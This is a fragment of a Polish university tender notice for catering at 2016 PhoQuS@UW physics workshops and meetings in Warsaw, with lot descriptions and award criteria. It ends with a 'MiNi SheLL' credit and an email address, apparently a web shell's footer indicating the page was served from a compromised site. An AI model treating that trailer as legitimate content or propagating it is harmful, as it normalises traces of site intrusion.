1. Pierwszą przerwę kawową (poranną) - każdy z 3 dni (w terminie od 02.03.2016 do 04.03.2016) w formie bufetu, według przekazanego Wykonawcy harmonogramu, serwowaną w budynku Wydziału Fizyki UW przy ul. Pasteura 5 lub we wskazanym przez Zamawiającego miejscu (czas trwania 30 min.)
2. Przerwę obiadową - każdy z 3 dni (w terminie od 02.03.2016 do 04.03.2016) w formie bufetu, według przekazanego Wykonawcy harmonogramu, serwowaną w budynku Wydziału Fizyki UW przy ul. Pasteura 5 lub we wskazanym przez Zamawiającego miejscu (czas trwania 90 min.)
3. Drugą przerwę kawową - każdy z 3 dni (w terminie od 02.03.2016 do 04.03.2016)  w formie bufetu, według przekazanego Wykonawcy harmonogramu, serwowaną w budynku Wydziału Fizyki UW przy ul. Pasteura 5 lub we wskazanym przez Zamawiającego miejscu (czas trwania 30 min.)
3. Drugą przerwę kawową - każdy z 3 dni (w terminie od 02.03.2016 do 04.03.2016)  w formie bufetu, według przekazanego Wykonawcy harmonogramu, serwowaną w budynku Wydziału Fizyki UW przy ul. Pasteura 5 lub we wskazanym przez Zamawiającego miejscu (czas trwania 30 min.)

III. Wynajem sprzętu gastronomicznego:
Usługa planowana jest dla ok. 20 osób w dniach 02.03.2016-04.03.2016 r. (3 dni). Podana liczba osób może ulec zmniejszeniu lub zwiększeniu o 20%. Ostateczna liczba osób zostanie podana 5 dni przed terminem realizacji usługi drogą elektroniczną lub telefoniczną.

Szczegółowy opis przedmiotu zamówienia zawiera SIWZ - zamieszczona na stronie internetowej Zamawiającego - www.fuw.edu.pl.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 55.30.00.00-3.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 04.03.2016.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 90</li>
<li>2. Doświadczenie zawodowe - 10</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Świadczenie usług gastronomicznych wraz z wynajęciem sprzętu gastronomicznego podczas Warsztatów Spectral and Spatial Engineering of Quantum Light odbywających się w ramach projektu PhoQuS@UW na Wydziale Fizyki UW w marcu-kwietniu 2016 r.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Realizacją części 2 zamówienia obejmuje:

I: Serwowanie wody dla prelegentów w salach wykładowych - każdy z 3dni (w terminie od 30.03.2016 do 01.04.2016) (serwowana w godzinach od 09.00 do 18.00, w salach wykładowych w budynku Wydziału Fizyki UW przy ul. Pasteura 5 lub we wskazanym przez Zamawiającego miejscu wraz z szklankami).
1)	woda mineralna niegazowana, w butelkach szklanych 0,33l - 6 butelek
2)	woda mineralna gazowana, w butelkach szklanych 0,33l - 4 butelki

II. Świadczenie usług gastronomicznych:
Usługi planowane są dla ok. 35 osób, będących pracownikami Uniwersytetu Warszawskiego, w dniach od 30.03.2016 do 01.04.2016 (3 dni). Podana liczba osób może ulec zmniejszeniu lub zwiększeniu o 20%.
Ostateczna liczba osób zostanie podana 5 dni przed terminem realizacji usługi drogą elektroniczną lub telefoniczną.
Usługi gastronomiczne dla uczestników warsztatów obejmują:
1. Pierwszą przerwę kawową (poranną) - każdy z 3 dni (w terminie od 30.03.2016 do 01.04.2016) w formie bufetu, według przekazanego Wykonawcy harmonogramu, serwowaną w budynku Wydziału Fizyki UW przy ul. Pasteura 5 lub we wskazanym przez Zamawiającego miejscu (czas trwania 30 min.)
2. Przerwę obiadową - każdy z 3 dni (w terminie od 30.03.2016 do 01.04.2016) w formie bufetu, według przekazanego Wykonawcy harmonogramu, serwowaną w budynku Wydziału Fizyki UW przy ul. Pasteura 5 lub we wskazanym przez Zamawiającego miejscu (czas trwania 90 min.)
3. Drugą przerwę kawową - każdy z 3 dni (w terminie od 30.03.2016 do 01.04.2016) w formie bufetu, według przekazanego Wykonawcy harmonogramu, serwowaną w budynku Wydziału Fizyki UW przy ul. Pasteura 5 lub we wskazanym przez Zamawiającego miejscu (czas trwania 30 min.)
4. Kolację zasiadaną w lokalu Wykonawcy dla ok. 35 osób, będących pracownikami Uniwersytetu Warszawskiego, w dniu 31.03.2016 r.
Podana liczba osób może ulec zmniejszeniu lub zwiększeniu o 20%. Ostateczna liczba osób zostanie podana 2 dni przed terminem realizacji usługi drogą elektroniczną lub telefoniczną.

III. Wynajem sprzętu gastronomicznego:
Usługa planowana jest dla ok. 15 osób w dniach od 30.03.2016 do 01.04.2016 (3 dni). Podana liczba osób może ulec zmniejszeniu lub zwiększeniu o 20%. Ostateczna liczba osób zostanie podana 5 dni przed terminem realizacji usługi drogą elektroniczną lub telefoniczną.

Szczegółowy opis przedmiotu zamówienia zawiera SIWZ zamieszczony na stronie internetowej Zamawiającego - www.fuw.edu.pl.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 55.30.00.00-3.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 01.04.2016.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 90</li>
<li>2. Doświadczenie zawodowe - 10</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Świadczenie usług gastronomicznych w trakcie Warsztatów innowacyjności odbywających się w ramach projektu PhoQuS@UW.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Realizacją części 3 zamówienia obejmuje:

I: Serwowanie wody dla prelegentów w salach wykładowych - każdy z 2 dni (marzec 2016 - dokładny termin zostanie podany przez Zamawiającego drogą elektroniczną z 10 dniowym wyprzedzeniem)  (serwowaną w godzinach od 09.00 do 17.00, w salach wykładowych w budynku Wydziału Fizyki UW przy ul. Pasteura 5 lub we wskazanym przez Zamawiającego miejscu wraz z szklankami)
1)	woda mineralna niegazowana, w butelkach szklanych 0,33l - 6 butelek
2)	woda mineralna gazowana, w butelkach szklanych 0,33l - 4 butelki

II. Świadczenie usług gastronomicznych:
Usługi planowane są dla ok. dla ok. 50 osób, będących pracownikami Uniwersytetu Warszawskiego, w marcu 2016 - dokładny termin zostanie podany przez Zamawiającego drogą elektroniczną z 10 dniowym wyprzedzeniem (2 dni). Podana liczba osób może ulec zmniejszeniu lub zwiększeniu o 20%. Ostateczna liczba osób zostanie podana 5 dni przed terminem realizacji usługi drogą elektroniczną lub telefoniczną.
Zapewnienie usługi gastronomicznej dla uczestników warsztatów obejmuje:
1. Pierwszą przerwę kawową (poranną) - każdy z 2 dni (w marcu 2016 - dokładny termin zostanie podany przez Zamawiającego drogą elektroniczną z 10 dniowym wyprzedzeniem) w formie bufetu, według przekazanego Wykonawcy harmonogramu, serwowaną w budynku Wydziału Fizyki UW przy ul. Pasteura 5 lub we wskazanym przez Zamawiającego miejscu (czas trwania 30 min.)
2. Przerwę obiadową - każdy z 2 dni (w marcu 2016 - dokładny termin zostanie podany przez Zamawiającego drogą elektroniczną z 10 dniowym wyprzedzeniem) w formie bufetu, według przekazanego Wykonawcy harmonogramu, serwowaną w budynku Wydziału Fizyki UW przy ul. Pasteura 5 lub we wskazanym przez Zamawiającego miejscu (czas trwania 90 min.)
Szczegółowy opis przedmiotu zamówienia zawiera SIWZ zamieszczony na stronie internetowej Zamawiającego - www.fuw.edu.pl.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 55.30.00.00-3.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 2.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 90</li>
<li>2. Doświadzcenie zawodowe - 10</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> Świadczenie usług gastronomicznych wraz z wynajęciem sprzętu gastronomicznego w trakcie drugiego spotkania ewaluacyjnego projektu PhoQuS@UW.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Realizacją części 4 zamówienia obejmuje:

I: Serwowanie wody dla prelegentów w salach wykładowych - każdy z 2 dni (w kwietniu 2016 - dokładny termin zostanie podany przez Zamawiającego drogą elektroniczną z 30 dniowym wyprzedzeniem) (serwowana w godzinach od 09.00 do 18.00, na stołach uczestników w salach obrad, lub innym miejscu wyznaczonym przez Zamawiającego, w budynku Wydziału Fizyki UW przy ul. Pasteura 5 we wskazanym przez Zamawiającego miejscu  wraz z szklankami)
a.	Woda mineralna niegazowana, w butelkach szklanych 0,33l - 14 butelek
b.	Woda mineralna gazowana, w butelkach szklanych 0,33l - 6 butelek

II. Świadczenie usług gastronomicznych:
Usługi planowane są dla ok. 20 osób, będących pracownikami Uniwersytetu Warszawskiego, (w kwietniu 2016 - dokładny termin zostanie podany przez Zamawiającego drogą elektroniczną z 30 dniowym wyprzedzeniem) (2 dni). Podana liczba osób może ulec zmniejszeniu lub zwiększeniu o 20%. Ostateczna liczba osób zostanie podana 5 dni przed terminem realizacji usługi drogą elektroniczną lub telefoniczną.

Usługi gastronomiczne dla uczestników spotkania obejmują:
1. Serwis kawowy w trakcie całego spotkania ewaluacyjnego - w ciągu 2 dni w godz. 0d 08:00 do 17:00 (kwiecień 2016 - dokładny termin zostanie podany przez Zamawiającego drogą elektroniczną z 30 dniowym wyprzedzeniem), według przekazanego Wykonawcy harmonogramu, serwowaną w formie bufetu w budynku Wydziału Fizyki UW przy ul. Pasteura 5 lub we wskazanym przez Zamawiającego miejscu.
2. Przerwę obiadową - każdy z 2 dni (kwiecień 2016 - dokładny termin zostanie podany przez Zamawiającego drogą elektroniczną z 30 dniowym wyprzedzeniem), według przekazanego Wykonawcy harmonogramu, serwowaną w formie bufetu w budynku Wydziału Fizyki UW przy ul. Pasteura 5 lub we wskazanym przez Zamawiającego miejscu (czas trwania 90 min.)
3. Kolację zasiadaną w lokalu Wykonawcy dla ok. 12 osób, będących pracownikami Uniwersytetu Warszawskiego, w pierwszym dniu spotkania (kwiecień 2016 - dokładny termin zostanie podany przez Zamawiającego drogą elektroniczną z 30 dniowym wyprzedzeniem).  Podana liczba osób może ulec zmniejszeniu lub zwiększeniu o 20%. Ostateczna liczba osób zostanie podana 2 dni przed terminem realizacji usługi drogą elektroniczną lub telefoniczną.

III. Wynajem sprzętu gastronomicznego:
Usługa planowana jest dla ok. 5 osób w kwietniu 2016 (2 dni) - dokładny termin zostanie podany przez Zamawiającego drogą elektroniczną z 30 dniowym wyprzedzeniem). Podana liczba osób może ulec zmniejszeniu lub zwiększeniu o 20%. Ostateczna liczba osób zostanie podana 5 dni przed terminem realizacji usługi drogą elektroniczną lub telefoniczną.

Szczegółowy opis przedmiotu zamówienia zawiera SIWZ zamieszczony na stronie internetowej Zamawiającego - www.fuw.edu.pl.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 55.30.00.00-3.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 2.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 90</li>
<li>2. Doświadczenie zawodowe - 10</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 5 <b>NAZWA:</b> Świadczenie usług gastronomicznych wraz z wynajęciem sprzętu gastronomicznego w trakcie trzeciego spotkania ewaluacyjnego projektu PhoQuS@UW.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Realizacją części 5 zamówienia obejmuje:

I: Serwowanie wody dla prelegentów w salach wykładowych - w ciągu 2 dni (wrzesień 2016 - dokładny termin zostanie podany przez Zamawiającego drogą elektroniczną z 30 dniowym wyprzedzeniem) (serwowana w godzinach od 09.00 do 18.00, na stołach uczestników w salach obrad, lub innym miejscu wyznaczonym przez Zamawiającego, w budynku Wydziału Fizyki UW przy ul. Pasteura 5 we wskazanym przez Zamawiającego miejscu wraz z szklankami):
a.	Woda mineralna niegazowana, w butelkach szklanych 0,33l - 10 butelek
b.	Woda mineralna gazowana, w butelkach szklanych 0,33l - 4 butelek
II. Świadczenie usług gastronomicznych:
Usługi planowane są dla ok. 50 osób, będących pracownikami Uniwersytetu Warszawskiego, (wrzesień 2016 (2 dni) - dokładny termin zostanie podany przez Zamawiającego drogą elektroniczną z 30 dniowym wyprzedzeniem). Podana liczba osób może ulec zmniejszeniu lub zwiększeniu o 20%. Ostateczna liczba osób zostanie podana 5 dni przed terminem realizacji usługi drogą elektroniczną lub telefoniczną.

Usługi gastronomiczne dla uczestników spotkania obejmują:

1. Pierwszą przerwę kawową (poranną) - każdy z 2 dni (wrzesień 2016 r. - dokładny termin zostanie podany przez Zamawiającego drogą elektroniczną z 30 dniowym wyprzedzeniem), według przekazanego Wykonawcy harmonogramu, serwowaną w formie bufetu w budynku Wydziału Fizyki UW przy ul. Pasteura 5 lub we wskazanym przez Zamawiającego miejscu (czas trwania 30 min.)
2. Przerwę obiadową - każdy z 2 dni (wrzesień 2016 - dokładny termin zostanie podany przez Zamawiającego drogą elektroniczną z 30 dniowym wyprzedzeniem), według przekazanego Wykonawcy harmonogramu, serwowaną w formie bufetu w budynku Wydziału Fizyki UW przy ul. Pasteura 5 lub we wskazanym przez Zamawiającego miejscu (czas trwania 90 min.)
3. Druga przerwa kawową - każdy z 2 dni (wrzesień 2016 - dokładny termin zostanie podany przez Zamawiającego drogą elektroniczną z 30 dniowym wyprzedzeniem), według przekazanego Wykonawcy harmonogramu, serwowaną w formie bufetu w budynku Wydziału Fizyki UW przy ul. Pasteura 5 lub we wskazanym przez Zamawiającego miejscu (czas trwania 30 min.)
4. Kolację zasiadaną w lokalu Wykonawcy dla ok. 40 osób, w pierwszym dniu spotkania (wrzesień 2016 - dokładny termin zostanie podany przez Zamawiającego drogą elektroniczną z 30 dniowym wyprzedzeniem).  Podana liczba osób może ulec zmniejszeniu lub zwiększeniu o 20%. Ostateczna liczba osób zostanie podana 2 dni przed terminem realizacji usługi drogą elektroniczną lub telefoniczną.

III. Wynajem sprzętu gastronomicznego:
Usługa planowana jest dla ok. 10 osób (wrzesień 2016 (2 dni)- dokładny termin zostanie podany przez Zamawiającego drogą elektroniczną z 30 dniowym wyprzedzeniem). Podana liczba osób może ulec zmniejszeniu lub zwiększeniu o 20%. Ostateczna liczba osób zostanie podana 5 dni przed terminem realizacji usługi drogą elektroniczną lub telefoniczną.

Szczegółowy opis przedmiotu zamówienia zawiera SIWZ zamieszczony na stronie internetowej Zamawiającego - www.fuw.edu.pl.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 55.30.00.00-3.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 2.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 90</li>
<li>2. Doświadczenie zawodowe - 10</li>
</ul>
</li>
</ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com